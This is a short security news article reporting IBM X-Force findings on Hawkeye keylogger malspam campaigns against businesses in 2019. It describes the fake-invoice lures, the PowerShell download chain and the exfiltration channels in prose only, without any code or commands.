Businesses around the world are being targeted by threat actors distributing the Hawkeye keylogger. IBM X-Force researchers identified major campaigns in April and May that targeted businesses across a range of industry sectors, including healthcare, transportation, logistics, marketing, agriculture, and importers and exporters.
The Hawkeye keylogger was first identified in 2013 and is still under active development. The malware is primarily an information stealer that is used to obtain login credentials and other sensitive information. The malware can also act as a loader for other malware variants and leverages its botnets to download malware onto infected devices as a service for third-party cybercriminals.
The malware is being offered on hacking forums and darknet marketplaces. The previous owner sold the malware in December 2018 and the new owner is offering the malware under a licensing model via a network of resellers as an “Advance Monitoring Solution” with the promise of further updates to the malware over time.
Hawkeye Reborn v9 and v8 have been used in campaigns throughout April and May. Attacks with the new variant have been identified in Spain, UAE, and the U.S, with the v8 campaign focused on users in Spain. The campaigns target business users where the potential rewards for a successful infection are higher.
The malware is being distributed via malspam via servers in Estonia and Turkey. IBM X Force researchers believe the same threat actor has conducted both campaigns. Other threat actors are also believed to be using the malware.
The emails used in the attacks masquerade as Spanish banks and other banks and legitimate companies. The emails intercepted by IBM X-Force researchers were not particularly well written and did not include the spoofed company’s logo, but the sender’s name had been spoofed to make the messages appear to have come from a legitimate domain.
The email messages contain a fake commercial invoice as an attachment. If opened, the commercial invoice will be displayed, but in the background the Hawkeye keylogger is downloaded. Several executable files are used in the infection process, which leverage malicious PowerShell scripts to download Hawkeye and secondary malware payloads. Once infected, information is exfiltrated via FTP, HTTP, and SMTP.
IoCs are available on IBM X-Force Exchange.